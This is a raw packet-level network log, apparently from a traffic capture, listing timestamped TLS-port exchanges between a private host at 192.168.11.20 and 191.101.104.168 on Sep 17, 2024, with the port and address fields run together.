                                                    Sep 17, 2024 03:59:47.057949066 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.058049917 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.058254957 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.058268070 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.058398008 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.058527946 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.058578968 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.058585882 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.058748007 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.059360981 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.059578896 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.059650898 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.059902906 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.060530901 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.060659885 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.060746908 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.060828924 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.060834885 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.060930014 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.061717987 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.061945915 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.061953068 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.062011003 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.062191963 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.062199116 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.062715054 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.062844038 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.062850952 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.063039064 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.063268900 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.063443899 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.063483953 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.063488960 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.063570976 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.063618898 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.064182043 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.064469099 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.064479113 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.064485073 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.064621925 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.064651012 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.064948082 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.065145016 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.065171003 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.065300941 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.065469027 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.065980911 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.066145897 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.066256046 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.066431999 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.067079067 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.067212105 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.067452908 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.067706108 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.067711115 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.067826033 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.067847967 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.067852974 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.068042994 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.068078041 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.068200111 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.068248034 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.069513083 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.069708109 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.069788933 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.069993973 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.070045948 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.070251942 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.070318937 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.070326090 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.070410013 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.070417881 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.070487022 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.070492983 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.070656061 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.071768999 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.071995974 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.072002888 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.072063923 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.072252989 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.072264910 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.072408915 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.072596073 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.072607994 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.072680950 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.072866917 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.072873116 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.073070049 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.073201895 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.073256016 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.073266983 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.073401928 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.074431896 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.074557066 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.074635029 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.074856997 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.075123072 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.075190067 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.075335026 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.075440884 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.075608969 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.075850964 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.075922966 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.076103926 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.076675892 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.076922894 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.077023029 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.077157021 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.077222109 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.077724934 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.077944040 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.077950001 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.078157902 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.078164101 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.078324080 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.078847885 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.079108953 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.079145908 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.079154968 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.079236984 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.079339027 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.079340935 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.079345942 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.079535961 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.079679012 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.079874039 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.080687046 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.080868006 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.080940962 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.081069946 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.081154108 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.081173897 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.081182003 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.081451893 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.084652901 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.084846973 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.084897995 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.084903955 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.085032940 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.085099936 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.085294962 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.085300922 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.085398912 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.085438013 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.085443974 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.085581064 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.086011887 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.086227894 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.086270094 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.086281061 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.086386919 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.086507082 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.086633921 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.086637974 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.086680889 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.086688042 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.086863041 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.086951971 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.086962938 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.086983919 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.087066889 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.087258101 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.087264061 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.087290049 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.087333918 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.087426901 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.087431908 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.087496996 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.087595940 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.087600946 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.087673903 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.087897062 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.088051081 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.088057041 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.088238001 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.088318110 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.088329077 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.088480949 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.088567972 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.088713884 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.088722944 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.088888884 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.088895082 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.088901997 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.089065075 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.089093924 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.089402914 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.089409113 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.089477062 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.089545965 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.089553118 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.089669943 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.089890003 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.090157032 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.090163946 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.090312004 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.091572046 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.091742992 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.091821909 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.091975927 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.091984987 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.092143059 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.092185020 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.092191935 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.092380047 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.092793941 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.093002081 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.093018055 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.093025923 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.093225002 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.094464064 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.094655037 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.094664097 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.094723940 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.094799995 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.094805002 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.094913960 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.094949007 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.095071077 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.095076084 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.095252991 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.096359968 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.096528053 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.096615076 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.096760988 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.096767902 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.096918106 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.096987009 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.097203016 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.097208977 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.097333908 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.097381115 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.097559929 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.097723007 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.097956896 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.098242998 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.098248959 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.098334074 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.098386049 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.098392010 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.098531961 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.098727942 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.098958015 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.098964930 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.099101067 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.099884987 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.100090027 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.100224972 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.100414991 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.100461960 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.100697041 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.100882053 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.100970984 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.101103067 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.101155043 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.101481915 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.101679087 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.101838112 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.101960897 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.102013111 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.102200985 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.102404118 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.102421999 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.102546930 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.102634907 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.102689028 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.102699995 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.102886915 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.103008986 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.103224993 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.103339911 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.103590965 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.103609085 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.103729010 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.103833914 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.103847980 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.104041100 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.104209900 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.104406118 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.104556084 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.104783058 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.105058908 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.105185986 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.105233908 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.105272055 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.105496883 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.106664896 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.106825113 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.106825113 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.107021093 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.107201099 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.107713938 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.107877016 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.108026981 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.108217001 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.108335972 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.108508110 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.108565092 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.108571053 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.108704090 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.108733892 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.108902931 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.108907938 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.108990908 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.109045982 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.109051943 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.109189987 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.109253883 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.109260082 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.109318972 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.109370947 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.109422922 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.109427929 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.109616041 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.109652996 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.109792948 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.109797001 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.109843969 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.109942913 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.109949112 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.110033989 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.110193014 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.110346079 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.110352039 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.110426903 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.110591888 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.110621929 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.110626936 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.110735893 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.110814095 CEST49759443192.168.11.20191.101.104.168
                                                    Sep 17, 2024 03:59:47.110959053 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.111150980 CEST44349759191.101.104.168192.168.11.20
                                                    Sep 17, 2024 03:59:47.111165047 CEST49759443192.168.11.20191.101.104.168
